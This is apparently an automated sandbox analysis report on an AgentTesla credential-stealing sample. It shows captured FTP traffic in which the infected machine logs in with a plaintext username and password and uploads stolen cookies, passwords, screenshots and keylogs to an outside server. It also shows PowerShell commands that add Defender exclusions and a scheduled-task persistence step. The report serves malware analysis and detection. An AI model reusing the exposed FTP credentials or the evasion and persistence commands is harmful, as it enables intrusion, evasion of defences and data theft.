                                                                                                                  Jan 10, 2025 19:16:39.020669937 CET2149743110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.326 seconds (measured here), 10.05 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:39.022691011 CET4974321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:39.347632885 CET2149743110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,216,144)
                                                                                                                  Jan 10, 2025 19:16:39.349699974 CET2149753110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 02:16. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:16:39.349905014 CET4975321192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:16:39.353792906 CET4974321192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-745481_2025_01_10_20_44_20.txt
                                                                                                                  Jan 10, 2025 19:16:39.742343903 CET2149753110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:16:39.742525101 CET4975321192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:16:40.120299101 CET2149753110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:16:40.194278002 CET2149743110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:40.485646963 CET2149753110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:16:40.487755060 CET4975321192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:16:40.606847048 CET2149743110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                                  Jan 10, 2025 19:16:40.824549913 CET2149753110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:16:40.824840069 CET4975321192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:16:41.161221027 CET2149753110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:16:41.161412001 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:41.497663021 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,206)
                                                                                                                  Jan 10, 2025 19:16:41.503463030 CET4975321192.168.2.4110.4.45.197STOR PW_user-745481_2025_01_10_13_16_37.html
                                                                                                                  Jan 10, 2025 19:16:42.333451033 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:42.662556887 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.330 seconds (measured here), 1.03 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:42.686995983 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:43.022823095 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,225,60)
                                                                                                                  Jan 10, 2025 19:16:43.037434101 CET4975321192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-745481_2025_01_10_19_15_26.txt
                                                                                                                  Jan 10, 2025 19:16:43.861056089 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:44.193226099 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.331 seconds (measured here), 9.90 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:44.193682909 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:44.530107021 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,205,48)
                                                                                                                  Jan 10, 2025 19:16:44.535860062 CET4975321192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-745481_2025_01_10_21_14_27.txt
                                                                                                                  Jan 10, 2025 19:16:45.396611929 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:45.737381935 CET2149753110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                                  Jan 10, 2025 19:16:47.572391033 CET2149759110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 02:16. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:16:47.572640896 CET4975921192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:16:47.901946068 CET2149759110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:16:47.902174950 CET4975921192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:16:48.285723925 CET2149759110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:16:48.646336079 CET2149759110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:16:48.647973061 CET4975921192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:16:48.977348089 CET2149759110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:16:48.977613926 CET4975921192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:16:49.307099104 CET2149759110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:16:49.307257891 CET4975921192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:49.639954090 CET2149759110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,229,107)
                                                                                                                  Jan 10, 2025 19:16:49.648005962 CET4975921192.168.2.4110.4.45.197STOR PW_user-745481_2025_01_10_13_16_45.html
                                                                                                                  Jan 10, 2025 19:16:50.477369070 CET2149759110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:50.809942961 CET2149759110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.332 seconds (measured here), 1.02 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:50.837033033 CET4975921192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:51.167097092 CET2149759110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,240,151)
                                                                                                                  Jan 10, 2025 19:16:51.173996925 CET4975921192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-745481_2025_01_10_19_25_32.txt
                                                                                                                  Jan 10, 2025 19:16:52.018157005 CET2149759110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:52.372354984 CET2149759110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.331 seconds (measured here), 9.90 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:52.372692108 CET4975921192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:52.701991081 CET2149759110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,249,242)
                                                                                                                  Jan 10, 2025 19:16:52.707375050 CET4975921192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-745481_2025_01_10_21_34_29.txt
                                                                                                                  Jan 10, 2025 19:16:53.541420937 CET2149759110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:53.871710062 CET2149759110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                                  Jan 10, 2025 19:17:51.693269014 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:17:52.029386044 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,254,9)
                                                                                                                  Jan 10, 2025 19:17:52.034769058 CET4975321192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_19_05_33_21.jpeg
                                                                                                                  Jan 10, 2025 19:17:52.677995920 CET4973821192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:17:52.867397070 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:17:53.002171040 CET2149738110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,139)
                                                                                                                  Jan 10, 2025 19:17:53.007759094 CET4973821192.168.2.4110.4.45.197STOR KL_user-745481_2025_01_24_06_41_35.html
                                                                                                                  Jan 10, 2025 19:17:53.580358028 CET2150005110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:17:53.580503941 CET5000521192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:17:53.661854982 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.794 seconds (measured here), 93.24 Kbytes per second
                                                                                                                  Jan 10, 2025 19:17:53.823311090 CET2149738110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:17:53.917577982 CET2150005110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:17:53.927798033 CET5000521192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:17:54.162164927 CET2149738110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.339 seconds (measured here), 0.81 Kbytes per second
                                                                                                                  Jan 10, 2025 19:17:54.303798914 CET2150005110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:17:54.641175032 CET2150005110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:17:54.641319036 CET5000521192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:17:54.978025913 CET2150005110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:17:54.978323936 CET5000521192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:17:55.315205097 CET2150005110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:17:55.315325975 CET5000521192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:17:55.651962996 CET2150005110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,219,138)
                                                                                                                  Jan 10, 2025 19:17:55.657310963 CET5000521192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_24_07_31_47.jpeg
                                                                                                                  Jan 10, 2025 19:17:56.483218908 CET2150005110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:17:56.822586060 CET2150031110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 02:17. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:17:56.822740078 CET5003121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:17:57.153232098 CET2150031110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:17:57.153458118 CET5003121192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:17:57.284276009 CET2150005110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.801 seconds (measured here), 92.43 Kbytes per second
                                                                                                                  Jan 10, 2025 19:17:57.523694038 CET2150031110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:17:57.892111063 CET2150031110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:17:57.894428968 CET5003121192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:17:58.226243973 CET2150031110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:17:58.226624012 CET5003121192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:17:58.557544947 CET2150031110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:17:58.557708979 CET5003121192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:17:58.888945103 CET2150031110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,220,190)
                                                                                                                  Jan 10, 2025 19:17:58.894705057 CET5003121192.168.2.4110.4.45.197STOR SC_user-745481_2025_02_03_04_40_23.jpeg
                                                                                                                  Jan 10, 2025 19:17:59.773782015 CET2150031110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:00.603761911 CET2150031110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.832 seconds (measured here), 89.04 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:07.674279928 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:08.010173082 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,253,86)
                                                                                                                  Jan 10, 2025 19:18:08.015813112 CET4975321192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_28_00_15_09.jpeg
                                                                                                                  Jan 10, 2025 19:18:08.865932941 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:09.661653042 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.796 seconds (measured here), 93.08 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:22.377106905 CET4975921192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:22.815439939 CET2149759110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,192,6)
                                                                                                                  Jan 10, 2025 19:18:22.822441101 CET4975921192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_28_21_20_30.jpeg
                                                                                                                  Jan 10, 2025 19:18:23.660964012 CET2149759110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:24.456626892 CET2149759110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.795 seconds (measured here), 93.12 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:30.613075018 CET2150040110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 02:18. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 02:18. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 02:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 02:18. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:18:30.613221884 CET5004021192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:18:30.936125040 CET2150040110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:18:30.936966896 CET5004021192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:18:31.280066013 CET2150040110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:18:31.619524002 CET2150040110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:18:31.620167971 CET5004021192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:18:31.943799019 CET2150040110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:18:31.943955898 CET5004021192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:18:32.138654947 CET4975921192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:32.184923887 CET4975321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:32.267169952 CET2150040110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:18:32.267363071 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:32.388719082 CET5003121192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:18:32.468861103 CET2149759110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,21)
                                                                                                                  Jan 10, 2025 19:18:32.474577904 CET4975921192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_10_13_18_31.jpeg
                                                                                                                  Jan 10, 2025 19:18:32.521197081 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,234,40)
                                                                                                                  Jan 10, 2025 19:18:32.526994944 CET4975321192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_10_13_18_31.jpeg
                                                                                                                  Jan 10, 2025 19:18:32.590508938 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,244,106)
                                                                                                                  Jan 10, 2025 19:18:32.595969915 CET5004021192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_10_13_18_28.jpeg
                                                                                                                  Jan 10, 2025 19:18:32.736267090 CET2150031110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,196,237)
                                                                                                                  Jan 10, 2025 19:18:32.743185997 CET5003121192.168.2.4110.4.45.197STOR SC_user-745481_2025_01_10_13_18_31.jpeg
                                                                                                                  Jan 10, 2025 19:18:33.300606966 CET2149759110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:33.352147102 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:33.416876078 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:33.569226027 CET2150031110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:18:34.095834970 CET2149759110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.795 seconds (measured here), 95.09 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:34.146756887 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.794 seconds (measured here), 95.27 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:34.208699942 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.791 seconds (measured here), 93.64 Kbytes per second
                                                                                                                  Jan 10, 2025 19:18:34.368439913 CET2150031110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.801 seconds (measured here), 94.53 Kbytes per second

                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:13:16:17
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\s2Jg1MAahY.exe"
                                                                                                                  Imagebase:0xb20000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:13:16:20
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"
                                                                                                                  Imagebase:0x700000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:13:16:20
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:13:16:21
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                                                                                                                  Imagebase:0x700000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:13:16:21
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:13:16:21
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp"
                                                                                                                  Imagebase:0xce0000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:13:16:21
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:13:16:21
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\s2Jg1MAahY.exe"
                                                                                                                  Imagebase:0xe50000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2977044627.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2977044627.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2977044627.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:13:16:22
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  Imagebase:0xda0000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
